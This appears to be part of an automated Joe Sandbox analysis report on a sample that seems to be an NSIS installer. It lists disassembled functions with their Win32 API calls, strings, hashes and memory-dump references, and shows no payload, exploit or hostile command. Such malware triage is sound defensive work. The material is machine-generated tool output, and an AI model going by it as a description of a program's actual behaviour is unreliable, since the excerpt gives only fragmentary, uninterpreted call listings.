                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                  • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                  • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                  • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402D23
                                                                  • wsprintfA.USER32 ref: 00402D33
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402D2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                  • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                  • Opcode Fuzzy Hash: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                  • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                  • wsprintfA.USER32 ref: 00406367
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040637B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-4240819195
                                                                  • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                  • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                  • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                  • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                  • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                  • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                  • Opcode Fuzzy Hash: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                  • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 551687249-2449383134
                                                                  • Opcode ID: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                  • Instruction ID: 58bd5faada6d9be10f0d72f5de6cba59a90cc667517f98c73a934b571b6f9a01
                                                                  • Opcode Fuzzy Hash: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                  • Instruction Fuzzy Hash: 23414F71900209EBCB10DF65DA4479E7BB8EF08756F14813BE911BA2E0C7799B41CB9D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                    • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                    • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID: /z
                                                                  • API String ID: 2987980305-1190999251
                                                                  • Opcode ID: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                  • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                  • Opcode Fuzzy Hash: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                  • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E
                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                  • CharNextA.USER32(?,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                  • CharPrevA.USER32(?,?,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: *?|<>/":
                                                                  • API String ID: 589700163-165019052
                                                                  • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                  • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
                                                                  • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                  • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 00401798
                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A3E8,0040A3E8,00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 004017C2
                                                                    • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                    • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                    • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1941528284-0
                                                                  • Opcode ID: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                  • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                  • Opcode Fuzzy Hash: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                  • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E
                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 00401D58
                                                                  • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                  • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                  • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                  • Opcode Fuzzy Hash: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                  • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401E02
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                  • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                  • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                  • Opcode Fuzzy Hash: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                  • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                  APIs
                                                                  • CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                  • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                  • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: :$\
                                                                  • API String ID: 3213498283-1166558509
                                                                  • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                  • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                  • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                  • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                  • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                  • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                  • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                  • wsprintfA.USER32 ref: 0040496A
                                                                  • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                  • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                  • Opcode Fuzzy Hash: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                  • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                  APIs
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Enum
                                                                  • String ID:
                                                                  • API String ID: 464197530-0
                                                                  • Opcode ID: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                  • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                  • Opcode Fuzzy Hash: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                  • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 0040561D
                                                                  • GetLastError.KERNEL32 ref: 00405631
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                  • GetLastError.KERNEL32 ref: 00405650
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID:
                                                                  • API String ID: 3449924974-0
                                                                  • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                  • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                  • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                  • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,00000000,00402F3E,00000001), ref: 00402D73
                                                                  • GetTickCount.KERNEL32 ref: 00402D91
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                  • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                  • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                  • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                  APIs
                                                                    • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                  • lstrlenA.KERNEL32(007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AC6
                                                                  • GetFileAttributesA.KERNEL32(007A0950,007A0950,007A0950,007A0950,007A0950,007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AD6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
